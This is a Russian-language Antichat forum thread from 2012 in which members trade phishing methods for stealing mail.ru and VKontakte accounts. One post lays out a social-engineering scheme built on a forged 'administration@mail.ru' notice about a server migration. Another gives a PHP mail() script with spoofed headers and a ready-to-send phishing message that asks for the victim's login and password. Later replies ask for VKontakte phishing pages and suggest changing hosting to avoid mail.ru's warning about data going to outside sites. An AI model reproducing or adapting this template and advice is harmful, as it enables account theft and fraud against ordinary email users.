HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.10.2012, 01:00
Kiebling
Участник форума
Регистрация: 27.07.2010
Сообщений: 253
С нами: 8312726

Репутация: 0
По умолчанию

Остались ли какие-нибудь фейки в теле письма для ВКонтакте, с переходом на фейк страницу, то есть, без окошка авторизации.
 
Ответить с цитированием

  #2  
Старый 02.11.2012, 01:00
Kiebling
Участник форума
Регистрация: 27.07.2010
Сообщений: 253
С нами: 8312726

Репутация: 0
По умолчанию

Люди, подскажите тематику письма для взлома.
 
Ответить с цитированием

  #3  
Старый 02.11.2012, 01:00
Love2013Love
Новичок
Регистрация: 02.11.2012
Сообщений: 3
С нами: 7118966

Репутация: 0
По умолчанию

Не буду взламывать сервер, не буду использовать sql-инъекции, не буду воровать cookies. Потому что большинство этих способов уже не работает – дыры в почтовых сервисах залатывают. Большинство статей по взлому почты безнадежно устарели. Буду использовать социальную инженерию.

Социальная инженерия - это метод несанкционированного доступа к информации или системам хранения информации без использования технических средств. Метод основан на использовании слабостей человеческого фактора и считается очень разрушительным. Злоумышленник получает информацию, например, путем сбора информации о служащих объекта атаки, с помощью обычного телефонного звонка или путем проникновения в организацию под видом ее служащего. Злоумышленник может позвонить работнику компании (под видом технической службы) и выведать пароль, сославшись на необходимость решения небольшой проблемы в компьютерной системе. Очень часто этот трюк проходит.

Пользователю приходит письмо от администрации mail.ru, в котором написано что мы переходим на новое оборудование и ваш ящик переносится на другой сервер. Поэтому вы должны подтвердить ваши данные. Чуть ниже размещена форма для ввода данных (имя, текущий пароль и т.д.). Далее пользователь заполняет форму, нажимает кнопку отправить и данные уходят на другой сервер, где сохраняются, а потом его перекидывает обратно на mail.ru. Все это проходит незаметно для пользователя. Единственная проблема чтобы пользователь поверил в правдивость письма. Для этого подделывается ящик отправителя administration@mail.ru и все фразы в тексте должны быть стандартными (вроде “благодарим Вас за понимание…”).

Подделываем письмо.
 
Ответить с цитированием

  #4  
Старый 02.11.2012, 01:00
Love2013Love
Новичок
Регистрация: 02.11.2012
Сообщений: 3
С нами: 7118966

Репутация: 0
По умолчанию

\r\n";
$header.="Subject: $subject \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";
$msg="



Уважаемый пользователь name@mail.ru!

От лица нашего интернет-холдинга Mail.ru мы просим извинения за причинение
вам некоторых неудобств.
В связи со сменой нашего оборудования на более новое нам нужно
перенести часть аккаунтов на новое оборудование.
Соответственно просим повторно прислать некоторую информацию о своем аккаунте.
Это нужно для предотвращения всякого рода ошибок и неточностей.

В противном случае Вы можете лишиться своего
почтового ящика!

Заполните нижеприведенную форму:

Логин: @mail.ru
Пароль:
Подтвердите пароль:
Имя:
Фамилия:

Спасибо за то, что Вы являетесь пользователем Mail.Ru.

С уважением, администрация Mail.ru

";
mail('name@mail.ru', $subject, $msg, $header);
?>
 
Ответить с цитированием

  #5  
Старый 02.11.2012, 01:00
Love2013Love
Новичок
Регистрация: 02.11.2012
Сообщений: 3
С нами: 7118966

Репутация: 0
По умолчанию

Кстати, этим способом можно отправлять письмо от имени любого человека. В таком виде письмо придет пользователю.
 
Ответить с цитированием

  #6  
Старый 02.11.2012, 01:00
Kiebling
Участник форума
Регистрация: 27.07.2010
Сообщений: 253
С нами: 8312726

Репутация: 0
По умолчанию

Цитата:

Сообщение от Love2013Love

Кстати, этим способом можно отправлять письмо от имени любого человека. В таком виде письмо придет пользователю.

С этим всем я уже давно знаком.
У тебя писем для ВКонтакте нету?
 
Ответить с цитированием

  #7  
Старый 02.11.2012, 01:00
stivens20
Постоянный
Регистрация: 14.12.2011
Сообщений: 310
С нами: 7585526

Репутация: 2
По умолчанию

Конкретно что надо?
 
Ответить с цитированием

  #8  
Старый 02.11.2012, 01:00
Kiebling
Участник форума
Регистрация: 27.07.2010
Сообщений: 253
С нами: 8312726

Репутация: 0
По умолчанию

Цитата:

Сообщение от stivens20

Конкретно что надо?

Фейк в теле письма для ВКонтакте, с переходом на фейк сайт. То есть, окно авторизации пользователя не нужно.
Хочу новый фейк сделать, а вот насчет тематики письма сложновато.
 
Ответить с цитированием

  #9  
Старый 03.11.2012, 01:00
Kiebling
Участник форума
Регистрация: 27.07.2010
Сообщений: 253
С нами: 8312726

Репутация: 0
По умолчанию

Ну а как сейчас обойти защиту Mail.ru? При вводе данных и при нажатие на кнопкочки "Войти", "Авторизоваться", "Подтвердить", всплывает окошко Mail.ru, с подтверждением отправки данных на сторонний ресурс.
 
Ответить с цитированием

  #10  
Старый 03.11.2012, 01:00
stivens20
Постоянный
Регистрация: 14.12.2011
Сообщений: 310
С нами: 7585526

Репутация: 2
По умолчанию

Хостинг поменяй.И все.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...